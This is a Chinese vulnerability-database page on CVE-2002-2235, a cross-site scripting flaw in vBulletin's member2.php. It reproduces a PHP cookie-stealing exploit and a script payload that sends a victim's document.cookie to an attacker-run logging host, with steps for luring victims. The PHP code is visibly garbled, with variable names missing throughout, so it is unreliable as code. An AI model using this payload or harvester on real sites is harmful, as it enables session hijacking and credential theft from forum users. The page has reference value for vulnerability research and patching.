VBulletin members2.php跨站脚本漏洞
| 漏洞ID | 1107111 | 漏洞类型 | 数字错误 |
| 发布时间 | 2002-11-25 | 更新时间 | 2002-12-31 |
![图片[1]-VBulletin members2.php跨站脚本漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
CVE-2002-2235 |
![图片[2]-VBulletin members2.php跨站脚本漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
CNNVD-200212-137 |
| 漏洞平台 | PHP | CVSS评分 | 5.0 |
|漏洞来源
|漏洞详情
vBulletin2.2.9及其早期版本的member2.php不能正确限制$perpage变量为整数。这导致出错消息反映到没有引用的用户,促进跨站脚本(XSS)和可能其他攻击。
|漏洞EXP
source: http://www.securityfocus.com/bid/6246/info
Due to insufficient sanitization of user supplied values, it is possible to exploit a vulnerability in VBulletin. By passing an invalid value to a variable located in 'members2.php', it is possible to generate an error page which will include attacker-supplied HTML code which will be executed in a legitimate users browser.
This issue may be exploited to steal cookie-based authentication credentials from legitimate users of the website running the vulnerable software. The attacker may use cookie-based authentication credentials to hijack the session of the legitimate user.
- Run this script on some host:
<?PHP
// vBulletin XSS Injection Vulnerability: Exploit
// ---
// Coded By : Sp.IC ([email protected]).
// Descrption: Fetching vBulletin's cookies and storing it into a
log file.
// Variables:
= "Cookies.Log";
// Functions:
/*
If (['Action'] = "Log") {
= "<!--";
= "--->";
}
Else {
= "";
= "";
}
Print ();
*/
Print ("<Title>vBulletin XSS Injection Vulnerability:
Exploit</Title>");
Print ("<Pre>");
Print ("<Center>");
Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>n");
Print ("Coded By: <B><A
Href="MailTo:[email protected]">Sp.IC</A></B><Hr Width="20%">");
/*
Print ();
*/
Switch (['Action']) {
Case "Log":
= ['Cookie'];
= StrStr (, SubStr (, BCAdd (0x0D,
StrLen (DecHex (MD5 (NULL))))));
= FOpen (, "a+");
FWrite (, Trim () . "n");
FClose ();
Print ("<Meta HTTP-Equiv="Refresh"
Content="0; URL=" . ['HTTP_REFERER'] . "">");
Break;
Case "List":
If (!File_Exists () || !In_Array ()) {
Print ("<Br><Br><B>There are No
Records</B></Center></Pre>");
Exit ();
}
Else {
Print ("</Center></Pre>");
= Array_UniQue (File ());
Print ("<Pre>");
Print ("<B>.:: Statics</B>n");
Print ("n");
Print ("^ Logged Records : <B>" . Count (File
()) . "</B>n");
Print ("^ Listed Records : <B>" . Count
() . " </B>[Not Counting Duplicates]n");
Print ("n");
Print ("<B>.:: Options</B>n");
Print ("n");
If (Count (File ()) > 0) {
['Download'] = "[<A Href="" .
. "">Download</A>]";
}
Else{
['Download'] = "[No Records in Log]";
}
Print ("^ Download Log : " .
['Download'] . "n");
Print ("^ Clear Records : [<A Href="" .
. "?Action=Delete">Y</A>]n");
Print ("n");
Print ("<B>.:: Records</B>n");
Print ("n");
While (List ([0], [1]) = Each ()) {
Print ("<B>" . [0] . ": </B>" . [1]);
}
}
Print ("</Pre>");
Break;
Case "Delete":
@UnLink ();
Print ("<Br><Br><B>Deleted
Succsesfuly</B></Center></Pre>") Or Die ("<Br><Br><B>Error: Cannot Delete
Log</B></Center></Pre>");
Print ("<Meta HTTP-Equiv="Refresh" Content="3; URL=" .
['HTTP_REFERER'] . "">");
Break;
}
?>
- Give a victim this link: member2.php?s=[Session]
&action=viewsubscription&perpage=[Script Code]
- Note: You can replace [Script Code] with: --
><Script>location='Http://[Exploit Path]?Action=Log&Cookie='+
(document.cookie);</Script>
- Then go to Http://[Exploit Path]?Action=List
|参考资料
来源:BID
名称:6246
链接:http://www.securityfocus.com/bid/6246
来源:XF
名称:vbulletin-member2-perpage-xss(10701)
链接:http://www.iss.net/security_center/static/10701.php
来源:SREASON
名称:3229
链接:http://securityreason.com/securityalert/3229
来源:BUGTRAQ
名称:20021123vBulletinXSSInjectionVulnerability
链接:http://online.securityfocus.com/archive/1/301076
相关推荐: Pserv 2.0 – User-Agent HTTP Header Buffer Overflow (2)
Pserv 2.0 – User-Agent HTTP Header Buffer Overflow (2) 漏洞ID 1053653 漏洞类型 发布时间 2002-11-30 更新时间 2002-11-30 CVE编号 N/A CNNVD-ID N/A 漏洞…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666